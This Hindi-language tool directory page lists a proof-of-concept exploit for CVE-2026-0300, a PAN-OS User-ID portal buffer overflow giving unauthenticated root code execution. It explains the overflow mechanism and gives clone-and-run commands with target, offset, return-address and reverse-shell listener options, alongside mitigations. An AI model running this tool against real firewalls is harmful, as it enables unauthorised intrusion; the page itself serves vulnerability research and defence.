Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-0300-POC — CVE-2026-0300 के लिए प्रूफ-ऑफ-कॉन्सेप्ट, PAN-OS User-ID Portal में एक गंभीर बफर ओवरफ्लो जो रूट विशेषाधिकारों के साथ अनधिकृत रिमोट कोड निष्पादन को सक्षम बनाता है। | Kitploit
उपकरण/GitHubGitHub/p3nt3st3r-star/cve-2026-0300-poc
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरेड टीमिंगपेलोड डेवलपमेंट
GitHubp3nt3st3r-star/cve-2026-0300-poc

CVE-2026-0300-POC

CVE-2026-0300 के लिए प्रूफ-ऑफ-कॉन्सेप्ट, PAN-OS User-ID Portal में एक गंभीर बफर ओवरफ्लो जो रूट विशेषाधिकारों के साथ अनधिकृत रिमोट कोड निष्पादन को सक्षम बनाता है।

रिपॉजिटरी देखें
21113 महीने पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

🛡️ CVE-2026-0300: PAN-OS User-ID™ Portal RCE विश्लेषण

शोध प्रूफ-ऑफ-कॉन्सेप्ट: CWE-787 आउट-ऑफ-बाउंड्स राइट

Security Python License Dependencies

📌 अवलोकन

CVE-2026-0300 Palo Alto Networks PAN-OS User-ID™ प्रमाणीकरण पोर्टल (कैप्टिव पोर्टल) में पहचानी गई एक उच्च-गंभीरता वाली बफर ओवरफ्लो भेद्यता है। यह शोध रिपॉजिटरी भेद्यता के तकनीकी तर्क को प्रदर्शित करती है, विशेष रूप से इस बात पर ध्यान केंद्रित करती है कि कैसे एक अनप्रमाणित नेटवर्क पैकेट रूट विशेषाधिकारों के साथ रिमोट कोड निष्पादन (RCE) की ओर ले जा सकता है।


📊 भेद्यता विवरण

विशेषताविवरण
CVE IDCVE-2026-0300
गंभीरता स्कोर9.3 (क्रिटिकल)
कमजोरी प्रकारCWE-787: आउट-ऑफ-बाउंड्स राइट
हमला वेक्टरनेटवर्क (अनप्रमाणित)
आवश्यक विशेषाधिकारकोई नहीं
उपयोगकर्ता सहभागिताकोई नहीं
प्रभावित सॉफ्टवेयरPAN-OS 12.1, 11.2, 11.1, 10.2

🔬 तकनीकी तंत्र

यह भेद्यता तब उत्पन्न होती है जब User-ID प्रमाणीकरण पोर्टल सेवा मेमोरी बफर में डेटा लिखने से पहले आने वाले डेटा की लंबाई को मान्य करने में विफल रहती है।

  1. बफर: सेवा पोर्टल अनुरोधों को संसाधित करने के लिए एक निश्चित आकार का मेमोरी क्षेत्र आवंटित करती है।
  2. ओवरफ्लो: एक विशेष रूप से तैयार किया गया POST अनुरोध इस आकार से अधिक पेलोड भेजता है।
  3. ओवरराइट: अतिरिक्त डेटा स्टैक/हीप को ओवरराइट कर देता है, जिससे हमलावर इंस्ट्रक्शन पॉइंटर (EIP/RIP) को नियंत्रित कर सकता है और मनमाना शेलकोड निष्पादित कर सकता है।

🛠️ स्थापना और सेटअप

1. पूर्वापेक्षाएँ

  • Python 3.9 या उच्चतर।
  • कोई बाहरी लाइब्रेरी आवश्यक नहीं (मानक socket, struct, और argparse का उपयोग करता है)।

2. शोध उपकरण क्लोन करना

रिपॉजिटरी क्लोन करें

root@kitploit:~
git clone https://github.com/p3Nt3st3r-sTAr/CVE-2026-0300-POC.git

फ़ोल्डर में नेविगेट करें

root@kitploit:~
cd CVE-2026-0300-POC

स्क्रिप्ट को निष्पादन योग्य बनाएं

root@kitploit:~
chmod +x research_poc.py

🚀 उपयोग गाइड

यह उपकरण एक पेशेवर CLI (कमांड लाइन इंटरफ़ेस) के साथ डिज़ाइन किया गया है।

मूल कमांड

root@kitploit:~
python3 research_poc.py -t <TARGET_IP> --lhost <LISTEN_IP> -L <LISTEN_PORT>

उन्नत पैरामीटर

फ़्लैगनामविवरणडिफ़ॉल्ट
-t--target(आवश्यक) फ़ायरवॉल का लक्ष्य IP पता।N/A
-p--portUser-ID पोर्टल चलाने वाला पोर्ट।6082
-o--offsetमेमोरी ओवरफ्लो बिंदु तक पहुंचने के लिए बाइट लंबाई।2048
-r--retहेक्साडेसिमल रिटर्न पता।0xdeadbeef
-l--lhostरिवर्स शेल IP पताआपका IP
-L--lportआपका लिसनर पोर्ट4444

🛡️ शमन और सुरक्षा

  • PAN-OS अपडेट करें: नवीनतम सुरक्षा पैच स्थापित करें (मई 2026 में जारी)।
  • IP प्रतिबंध: पोर्टल एक्सेस को विश्वसनीय आंतरिक IP ज़ोन तक सीमित करें।
  • पोर्टल अक्षम करें: यदि User-ID प्रमाणीकरण आवश्यक नहीं है, तो सुविधा अक्षम करें।

⚠️ नैतिक और कानूनी अस्वीकरण

केवल शैक्षिक और अधिकृत शोध के लिए। उन प्रणालियों के खिलाफ अनधिकृत परीक्षण जिनके आप स्वामी नहीं हैं, अवैध है। लेखक इस शोध कोड के किसी भी दुरुपयोग के लिए जिम्मेदार नहीं है। वैश्विक सुरक्षा में सुधार के लिए जिम्मेदारी से उपयोग करें। डेवलपर द्वारा: https://t.me/p3Nt3st3rsTAr भेद्यता खोज तिथि: मई 07, 2026

टूल डाउनलोड करें